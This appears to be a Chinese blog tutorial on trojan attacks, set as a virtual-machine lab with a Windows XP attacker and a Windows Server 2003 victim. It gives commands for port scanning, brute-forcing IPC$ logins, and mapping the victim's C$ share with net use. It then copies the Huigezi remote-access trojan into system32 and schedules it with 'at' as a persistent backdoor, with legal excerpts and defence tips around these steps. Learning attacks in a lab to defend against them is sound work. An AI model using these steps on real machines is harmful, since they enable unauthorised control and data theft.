数据来源
- 如何使用 Kali Linux 进行中间人攻击
目的
通过经典的木马攻击还原场景,来学习木马的制作,并实现植入木马对目标主机进行完全控制。
背景
木马概述
- 木马通常称为黑客程序,恶意代码,也称为特洛伊木马
- 基于远程控制的黑客工具
木马的特性
- 隐蔽性
- 潜伏性
- 再生性
木马的组成
- 客户端程序
客户端程序是安装在攻击者(黑客)方的控制台,它负责远程遥控指挥
- 服务器端程序
服务器端程序即是木马程序,它被隐藏安装在被攻击(受害)方的电脑上,目标主机也称为肉鸡
木马的危害
- 盗取用户信息
如:网游账户、网银信息、QQ密码等
- 传播病毒
- 占用系统资源,降低电脑效能
- 将本机作为工具来攻击其他设备等
中了木马的征兆
- 硬盘不停的读写
- 鼠标键盘不听使唤
- 窗口突然被关闭
- 新的窗口莫名其妙地打开
木马传播途径
- 网页浏览时利用浏览器漏洞或浏览器插件(H35h,迅雷等)漏洞;
- 通过QQ,MSN等即时通讯软件,发送恶意网址链接或木马病毒文件;
- 使用U盘等移动存储介质;
- 打开陌生的邮件,通过电子邮件内恶意代码或含木马病毒的附件;
- 伪装成多媒体影音文件或植入木马的应用软件,利用P2P平台和网站传播
- 利用操作系统漏洞或弱口令直接远程置入;
- 下载来源不明的程序。
网络安全法摘录:2017年6月1日正式实施
中华人民共和国刑法(第285、286条)
第二百八十五条
违反国家规定,入侵国家事务、国防建设、尖端科学技术领域的计算机信息系统,处三年以下有期徒刑或者拘役
第二百八十六条
违反国家规定,对计算机信息系统功能进行刪除、修改、增加、干扰、造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。
违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除修改、增加的操作,后果严重的,依照前款的规定处罚。
故意制作、传揣计算机病等破坏性程序,影晌计算机系统正綰运行,后果严的,依照第一款的规定处罚
中华人民共和国刑法修正案(七)
在刑法第二百八十五条中增加两款作为第二款、第三款:“违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信忘系统中存储、处理或者传输数据,或者对该计算机信息系统实施非法控制情节严重的,处三年以有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
提供专门用于入侵、非法控制计算机系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。
实验准备
环境:
Windowsxp -- 模拟黑客攻击机
Windows server2003 -- 模拟被木马控制方
工具(支持正版软件):
灰鸽子软件
暴力破解密码
端口扫描
密码本生成
基本流程
- 信息收集
如:
nslookup # 收集域名的IP地址
whois # 收集域名下的子域名
- 扫描漏洞
namp、ScanPort(软件)扫描:ip范围、端口
手工测试端口:telnet IP地址 测试端口
高级扫描:如IIS漏洞2003-IIS6.0、2008IIS7.0
扫描网站漏洞
- 漏洞利用
445端口漏洞利用之IPC$:net use
net use f:\\目标ip\share 密码 /user:用户 # 把对方的share文件映射到本地的f盘
很多电脑没有改管理员用户名的话用户名都是:Administrator 密码只能通过暴力破解
net use f: /del # 删除映射的f盘
net use * /del # 删除全部映射
net use f:\\目标ip\c$ 密码 /user:用户 # 把对方的c盘映射到本地的f盘
net use f:\\目标ip\ipc$ 密码 /user:用户
- 提权(shell环境、桌面环境、最高权限)
- 擦除痕迹(毁尸灭迹)
- 留后门
- 写渗透测试报告
开始实验 (注意:本实验目的是用来了解攻击,以便更好的防御攻击,攻击犯法)
准备两台虚拟机如:windowsXP -- 模拟黑客攻击机 windows server2003 -- 模拟被木马控制方
1)让两台虚拟机能互相通信(可以使用ping命令测试)
如:windows server2003的IP配置成:10.1.1.1/24,windowsXP的IP配置成:10.1.1.2/24,然后把两台虚拟就桥接到同一个虚拟网络就行了。(现实中肉鸡一般是服务器所以不用担心无法通信)
2) 使用xp虚拟机利用445攻击2003,使用工具先扫描2003的IP地址端口,或者使用名命令测试:telnet IP 测试端口,如:80,23,3389,445
3)暴力破解密码NTscan10只能针对445弹框做暴力破解,配合密码本生成器
软件的工作原理就是不断的执行命令:net use f:\\目标ip\ipc$ 密码 /user:用户
4)拿到账号信息之后,就可以在我们计算机上获取对方命令行的管理员权限
net use f: \\10.1.1.1\c$ 207080 /user:administrator # 把对方的c盘映射到自己的f写啥字母都可以,尽量不写自己的电脑盘。
copy con haha.bat # 创建一个脚本文件
copy haha.bat f: # 把haha.bat拷贝到自己的f盘,我们的f盘就是对方c盘映射过来的,所以就相当于把文件拷贝到对方的C盘
2003这台虚拟机就多出了一个 haha.bat 文件
所以建议不需要时就把445端口关闭,需要再开启。 IPC$ 是一条空链接,别人登录这条链接就能浏览电脑所有数据
net use \\10.1.1.1\ipc$ 207080 /user:administrator #把对方的整个电脑数据共享过来
拿到对方电脑的所有数据之后,我们就能进行一些操作,比如查看对方的磁盘文件目录
5)最后使用鸽子牧民战天在对方电脑留个后门,防止对方把445端口关了或把密码改了,以后又要重新渗透
制作木马
然后把木马程序放到对方的电脑上:copy d:\xiahezi.exe \\10.1.1.1\c$\windows\system32
然后要运行一下木马程序,以后就变成服务了:at \\ip 时间 “要运行的文件路径”
运行对方的木马文件: at \\10.1.1.1 15:48 "c:\windows\system32\xiahezi.exe"
为确保网络安全,以下是一些防御漏洞和木马的措施:
-
及时更新系统和应用程序:及时应用软件厂商发布的补丁程序,以修复已知漏洞。
-
安装杀毒软件和防火墙:杀毒软件可以扫描计算机并清除恶意代码,防火墙可阻止未经授权的访问,有助于防止网络攻击。
-
使用强密码和加密技术:使用长、有复杂性和难破解的密码,同时考虑采用双重身份验证。
-
避免下载不明来源的文件:只从可信的网站或来源下载软件、文档等。
-
增强用户教育意识:定期开展网络安全培训,提高用户对网络威胁的认识和警惕性。
-
定期备份数据:保留多个副本,并在不同位置进行存储,以免被单个攻击或设备损坏所毁坏。
这些措施将有助于减少漏洞和木马对您的计算机和网络造成的风险。
更多推荐
漏洞与木马:如何保护您的网络安全
发布评论